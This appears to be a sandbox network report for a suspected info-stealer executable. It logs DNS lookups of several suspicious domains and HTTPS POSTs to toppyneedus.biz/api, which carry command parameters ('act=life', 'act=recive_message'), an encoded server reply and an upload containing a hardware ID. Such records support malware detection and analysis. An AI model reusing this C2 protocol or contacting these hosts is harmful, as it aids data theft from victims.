Jan 26, 2025 15:48:04.709203005 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:04.967444897 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:04.967492104 CET | 443 | 49705 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:04.968055010 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:04.968055010 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:04.968092918 CET | 443 | 49705 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:05.015265942 CET | 49703 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:05.015377998 CET | 443 | 49703 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:05.459119081 CET | 443 | 49705 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:05.459224939 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:05.460684061 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:05.460694075 CET | 443 | 49705 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:05.461020947 CET | 443 | 49705 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:05.462308884 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:05.462503910 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
Jan 26, 2025 15:48:05.462531090 CET | 443 | 49705 | 172.67.149.66 | 192.168.2.7
Jan 26, 2025 15:48:05.462610960 CET | 49705 | 443 | 192.168.2.7 | 172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.462615967 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.110047102 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.110141993 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.110287905 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.110513926 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.110529900 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.477710009 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.477763891 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.477889061 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.478270054 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.478286028 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.973870993 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.974005938 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.975423098 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.975438118 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.975702047 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.977153063 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.977328062 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.977359056 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:07.480041981 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:07.480129957 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:07.480184078 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:07.480350018 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:07.480367899 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.146831989 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.146873951 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.146944046 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.147234917 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.147245884 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.667402983 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.667495966 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.669188976 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.669200897 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.669451952 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.670917034 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.671912909 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.671952963 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672080994 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672107935 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672276020 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672321081 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672452927 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672483921 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672652960 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672672987 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672844887 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672863007 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672871113 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672883034 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.673027039 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.673042059 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.673065901 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.673203945 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.673223972 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.682063103 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.682274103 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.682301998 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.682327986 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.682343960 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.682373047 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.686885118 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.270473003 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.270642042 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.270699978 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.270843029 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.270848989 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.321877003 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.321922064 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.322006941 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.322370052 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.322386980 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.847553968 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.847641945 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.849133968 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.849144936 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.849400043 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.850790977 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.850825071 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.850856066 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337049007 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337142944 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337233067 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:12.337462902 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:12.337486982 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337497950 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:12.337505102 CET44349746172.67.149.66192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 26, 2025 15:47:59.140929937 CET | 55855 | 53 | 192.168.2.7 | 1.1.1.1
Jan 26, 2025 15:47:59.150487900 CET | 53 | 55855 | 1.1.1.1 | 192.168.2.7
Jan 26, 2025 15:47:59.155700922 CET | 53091 | 53 | 192.168.2.7 | 1.1.1.1
Jan 26, 2025 15:47:59.166166067 CET | 53 | 53091 | 1.1.1.1 | 192.168.2.7
Jan 26, 2025 15:47:59.169214010 CET | 58904 | 53 | 192.168.2.7 | 1.1.1.1
Jan 26, 2025 15:47:59.180417061 CET | 53 | 58904 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 26, 2025 15:47:59.140929937 CET | 192.168.2.7 | 1.1.1.1 | 0x39e0 | Standard query (0) | financialfreez.click | A (IP address) | IN (0x0001) | false
Jan 26, 2025 15:47:59.155700922 CET | 192.168.2.7 | 1.1.1.1 | 0x1d2 | Standard query (0) | impolitewearr.biz | A (IP address) | IN (0x0001) | false
Jan 26, 2025 15:47:59.169214010 CET | 192.168.2.7 | 1.1.1.1 | 0xa18f | Standard query (0) | toppyneedus.biz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 26, 2025 15:47:59.150487900 CET | 1.1.1.1 | 192.168.2.7 | 0x39e0 | Name error (3) | financialfreez.click | none | none | A (IP address) | IN (0x0001) | false
Jan 26, 2025 15:47:59.166166067 CET | 1.1.1.1 | 192.168.2.7 | 0x1d2 | Name error (3) | impolitewearr.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 26, 2025 15:47:59.180417061 CET | 1.1.1.1 | 192.168.2.7 | 0xa18f | No error (0) | toppyneedus.biz | | 172.67.149.66 | A (IP address) | IN (0x0001) | false
Jan 26, 2025 15:47:59.180417061 CET | 1.1.1.1 | 192.168.2.7 | 0xa18f | No error (0) | toppyneedus.biz | | 104.21.29.142 | A (IP address) | IN (0x0001) | false
                                                                                                  • toppyneedus.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 172.67.149.66 | 443 | 7120 | C:\Users\user\Desktop\4JPKDcwtDo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:00 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: toppyneedus.biz
2025-01-26 14:48:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-26 14:48:00 UTC | 1122 | IN | HTTP/1.1 200 OK
Date: Sun, 26 Jan 2025 14:48:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qje5c9iiub7r9vd2g5j4q5sg5g; expires=Thu, 22 May 2025 08:34:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9QfZLP7%2FU1v81upKPlQn9umepJgyvYhLrDZsjDD72IfcDOU9cOwpqGpDOf%2FioQn0UYICAWbKSDvLmFcVRovrOrBaH9n2l01b9N2OuYxGFHcS0c8JUdkilVr1Pj9u3HTWKEU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90814d292f9843cd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2070&rtt_var=785&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1386514&cwnd=252&unsent_bytes=0&cid=ec975741d2145660&ts=1078&x=0"
2025-01-26 14:48:00 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-26 14:48:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 172.67.149.66 | 443 | 7120 | C:\Users\user\Desktop\4JPKDcwtDo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:01 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 42
Host: toppyneedus.biz
2025-01-26 14:48:01 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=
2025-01-26 14:48:01 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Sun, 26 Jan 2025 14:48:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qign9klnsgdf3cd0fshl7v0ogu; expires=Thu, 22 May 2025 08:34:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkj04EnX4T1f1JYErpEQbqpM%2FotqFJC1yPlfa9EQ7KHpAuVWVICuyQ6cLYGR9DQ0v3UAn%2F%2F6KLxAxkyNx1u7bCSBE6wuqmmmbMiHbDhe2YsFWWVxC5p%2FDfmiltGOnOg0hw0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90814d311a5641c3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1546&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=941&delivery_rate=1805813&cwnd=72&unsent_bytes=0&cid=323867f98df5541b&ts=529&x=0"
                                                                                                  Data Ascii: jbR2gC1O7uNe1fLRrFHb0VlRwTA6LVmkOl4IKk5LdHkMtaQVf9y/N9yQYIT92hkYnhXEN2vrS6EoXIp6mBp2Pk40pJQ+j22kXNfz064RXpDZkEJxOSgYJDleSGiMyObuHHaghitcoeSelnBXfdQJlIoSw6Lt/Jsk+F6KaYzIdr6P9qfUf06oJ5xUcNFuE5sTm1IBc/pvSDToXI96mBp9NEEn7titS38hjVezgvvD2RIZEQNzea+apTqeS6uNCDe
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 74 65 35 7a 57 37 6a 58 74 55 7a 55 4f 2f 52 6d 6c 50 62 55 45 45 78 2b 57 7a 5a 35 50 76 66 57 58 6b 65 43 37 44 74 6d 6d 64 75 30 6a 75 49 4b 53 53 56 46 54 4e 43 36 67 42 63 51 74 76 51 45 4b 54 72 37 74 79 6d 65 78 6e 4c 4b 30 32 4a 74 6a 6b 4d 4e 43 52 53 76 49 39 74 70 68 35 58 38 31 4e 74 6b 70 69 52 32 39 4a 43 63 54 6a 38 69 37 64 35 6d 31 6c 38 6e 67 48 30 4f 55 6d 33 70 52 54 34 79 6e 79 67 44 74 41 67 6b 79 37 44 7a 41 4c 61 30 63 4a 7a 2b 2b 2b 59 4a 6e 73 64 54 65 6c 50 79 37 53 2f 53 50 58 6e 56 2f 2b 4f 72 6d 51 63 30 76 4f 52 61 56 4b 65 6c 6b 6f 41 6b 4c 4d 39 2f 49 34 33 64 64 79 4e 62 6f 37 61 2b 72 67 4d 73 75 52 56 66 6c 79 72 64 46 73 47 63 56 48 39 78 63 6f 54 57 64 46 41 63 54 75 75 32 79 51 35 48 77 67 71 7a 34 74 30 66 77 78 32
                                                                                                  Data Ascii: te5zW7jXtUzUO/RmlPbUEEx+WzZ5PvfWXkeC7Dtmmdu0juIKSSVFTNC6gBcQtvQEKTr7tymexnLK02JtjkMNCRSvI9tph5X81NtkpiR29JCcTj8i7d5m1l8ngH0OUm3pRT4ynygDtAgky7DzALa0cJz+++YJnsdTelPy7S/SPXnV/+OrmQc0vORaVKelkoAkLM9/I43ddyNbo7a+rgMsuRVflyrdFsGcVH9xcoTWdFAcTuu2yQ5Hwgqz4t0fwx2
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 38 71 39 39 79 56 59 49 54 39 30 78 76 53 47 6c 47 43 38 66 67 74 57 53 50 36 33 49 33 71 7a 6b 69 31 76 6f 78 30 4a 64 53 39 44 75 2f 6b 33 68 65 78 55 53 79 44 79 59 4c 62 31 52 43 6b 36 2b 54 62 5a 62 74 4c 6e 2f 71 4a 32 66 43 74 6a 62 52 32 67 43 31 4d 72 69 61 66 31 54 42 52 4c 52 64 61 55 31 36 54 41 2f 42 2f 62 68 72 6d 4f 78 34 4b 4b 6b 2b 4c 39 44 36 49 39 53 61 57 2f 35 79 2f 4e 39 79 51 59 49 54 39 32 78 2f 58 57 4a 4c 44 74 33 6b 73 32 4f 4c 37 47 56 6c 35 48 67 34 33 4f 64 78 68 59 78 49 34 6a 57 74 30 57 77 5a 78 55 66 33 46 79 68 4e 59 55 6f 46 7a 65 47 67 5a 5a 76 75 65 69 79 6a 50 43 48 59 39 6a 58 5a 6e 56 33 32 50 72 6d 59 64 6c 62 47 51 72 6c 47 5a 77 73 6d 44 41 58 54 72 2b 6f 67 76 50 70 32 4b 61 64 34 4e 70 58 76 63 64 71 57 47 4b
                                                                                                  Data Ascii: 8q99yVYIT90xvSGlGC8fgtWSP63I3qzki1vox0JdS9Du/k3hexUSyDyYLb1RCk6+TbZbtLn/qJ2fCtjbR2gC1Mriaf1TBRLRdaU16TA/B/bhrmOx4KKk+L9D6I9SaW/5y/N9yQYIT92x/XWJLDt3ks2OL7GVl5Hg43OdxhYxI4jWt0WwZxUf3FyhNYUoFzeGgZZvueiyjPCHY9jXZnV32PrmYdlbGQrlGZwsmDAXTr+ogvPp2Kad4NpXvcdqWGK
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 4e 58 6e 4a 58 62 4a 49 66 67 6c 64 54 77 7a 46 36 4b 51 67 67 74 34 37 5a 61 55 69 61 59 50 50 4b 4a 32 64 56 4c 56 71 38 6f 70 79 57 63 56 52 6f 55 68 6b 57 6d 4e 42 44 75 6e 67 74 58 61 65 37 6e 59 30 6f 33 51 69 31 72 5a 2f 6e 5a 31 41 74 57 72 79 73 48 4a 50 77 57 53 30 58 6d 45 4c 4a 67 77 46 33 61 2f 71 49 4b 4f 68 5a 79 61 36 4f 79 62 4b 79 48 47 46 67 32 61 31 4f 61 53 59 5a 56 72 55 51 4c 70 44 65 58 55 6f 46 46 61 5a 76 65 41 79 7a 2f 34 31 4f 70 56 32 61 64 71 32 61 65 53 44 47 4f 4e 79 36 73 30 37 47 64 41 4c 37 77 38 76 53 48 70 65 42 4d 6a 35 73 53 65 6a 33 31 49 7a 6f 44 38 35 33 4f 45 2b 6e 64 51 59 2b 6e 4c 71 70 6a 56 51 78 56 43 6d 57 57 56 62 62 77 77 39 68 61 2b 71 49 4d 57 68 51 43 61 6b 4e 69 37 4e 35 33 7a 36 6a 46 4c 79 49 72 57
                                                                                                  Data Ascii: NXnJXbJIfgldTwzF6KQggt47ZaUiaYPPKJ2dVLVq8opyWcVRoUhkWmNBDungtXae7nY0o3Qi1rZ/nZ1AtWrysHJPwWS0XmELJgwF3a/qIKOhZya6OybKyHGFg2a1OaSYZVrUQLpDeXUoFFaZveAyz/41OpV2adq2aeSDGONy6s07GdAL7w8vSHpeBMj5sSej31IzoD853OE+ndQY+nLqpjVQxVCmWWVbbww9ha+qIMWhQCakNi7N53z6jFLyIrW
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 41 75 69 52 47 52 4e 5a 56 6c 4e 32 76 6d 78 64 70 71 74 66 54 53 6e 4e 47 6e 6b 75 48 48 46 32 67 43 31 42 37 47 52 65 31 37 55 57 76 70 76 59 30 64 72 51 41 50 4d 72 2f 77 67 6d 36 45 74 64 75 52 34 4c 63 71 32 61 59 33 49 41 36 42 68 35 63 38 6e 52 6f 78 53 39 31 6b 6f 45 7a 6f 43 51 74 6d 76 36 69 44 61 34 6d 63 33 72 44 73 2f 32 4c 45 50 34 35 74 56 2b 6e 36 38 6c 48 56 65 30 6c 32 73 41 32 42 49 63 6c 59 38 39 63 53 2b 5a 70 72 37 63 69 4f 4d 47 47 6d 56 74 6a 36 64 77 6d 47 31 65 76 4b 67 4f 78 6e 61 43 2b 38 50 58 55 68 6d 51 67 58 64 2f 76 39 49 76 74 74 50 5a 34 59 2f 50 4a 6e 43 4e 73 32 4c 55 2f 67 2b 38 74 45 31 58 34 49 54 35 77 45 6f 54 33 6b 4d 57 70 75 39 36 54 58 4f 74 69 56 33 74 58 59 77 6d 2b 42 78 68 63 67 57 74 53 44 79 78 7a 55 65
                                                                                                  Data Ascii: AuiRGRNZVlN2vmxdpqtfTSnNGnkuHHF2gC1B7GRe17UWvpvY0drQAPMr/wgm6EtduR4Lcq2aY3IA6Bh5c8nRoxS91koEzoCQtmv6iDa4mc3rDs/2LEP45tV+n68lHVe0l2sA2BIclY89cS+Zpr7ciOMGGmVtj6dwmG1evKgOxnaC+8PXUhmQgXd/v9IvttPZ4Y/PJnCNs2LU/g+8tE1X4IT5wEoT3kMWpu96TXOtiV3tXYwm+BxhcgWtSDyxzUe
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 45 6f 57 53 67 55 51 6f 7a 68 76 32 47 65 37 33 59 33 75 44 34 71 7a 66 56 32 34 36 52 39 2b 44 2b 33 6b 58 4a 6e 2f 47 71 39 58 32 56 45 62 77 34 69 7a 50 6d 78 58 71 50 57 5a 43 4b 36 65 67 2f 59 34 44 4b 64 31 42 6a 74 63 75 72 66 56 46 50 53 52 72 68 49 4b 6d 74 76 57 67 47 4c 6f 66 4a 6b 33 62 6b 31 41 4b 63 31 4c 4e 58 78 63 2f 79 51 53 50 67 39 74 64 31 56 58 74 52 49 39 77 45 6f 52 79 67 55 51 73 72 6c 6f 6d 32 53 35 6a 6b 69 73 44 39 70 6c 62 59 2f 6e 63 49 59 39 44 69 69 6b 6e 70 65 6a 6b 32 35 51 53 68 55 4a 6c 56 43 33 61 2f 71 4d 39 4f 68 5a 32 58 79 65 47 37 59 35 43 50 62 6d 55 37 32 64 59 79 68 57 45 76 46 57 37 51 4e 57 55 5a 73 57 68 66 49 2f 37 56 65 6f 38 78 6e 49 72 6f 37 61 2b 72 67 4d 74 32 55 58 37 56 38 38 6f 63 31 41 59 4a 6d 70
                                                                                                  Data Ascii: EoWSgUQozhv2Ge73Y3uD4qzfV246R9+D+3kXJn/Gq9X2VEbw4izPmxXqPWZCK6eg/Y4DKd1BjtcurfVFPSRrhIKmtvWgGLofJk3bk1AKc1LNXxc/yQSPg9td1VXtRI9wEoRygUQsrlom2S5jkisD9plbY/ncIY9Diiknpejk25QShUJlVC3a/qM9OhZ2XyeG7Y5CPbmU72dYyhWEvFW7QNWUZsWhfI/7Veo8xnIro7a+rgMt2UX7V88oc1AYJmp


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49702 | Destination IP: 172.67.149.66 | Destination Port: 443 | PID: 7120 | Process: C:\Users\user\Desktop\4JPKDcwtDo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:02 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=8WECHI4R4Q2XC
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 12809
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:02 UTC12809OUTData Raw: 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43
                                                                                                  Data Ascii: --8WECHI4R4Q2XCContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--8WECHI4R4Q2XCContent-Disposition: form-data; name="pid"2--8WECHI4R4Q2XCContent-Disposition: form-data; name="lid"4h5VfH----8WECHI4R4Q2XCC
2025-01-26 14:48:03 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:03 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=0pmcfjbbgn5kqgvto68gnd9hap; expires=Thu, 22 May 2025 08:34:41 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RZZfkJCj%2FK8tqnKpu1%2F6D1xrncavNqDDgnuB4bOzwb%2BkoATm5pXfum39J5Gwy0dqVt%2BUr5NANzaAcjedzOXLh9d6yP82zA95HoDlbIQBUkHske6%2BKgSzKhUv3bm9%2BAO%2FmU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d389aa87c82-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1801&rtt_var=681&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13743&delivery_rate=1601755&cwnd=216&unsent_bytes=0&cid=f557222bd6cc66c9&ts=618&x=0"
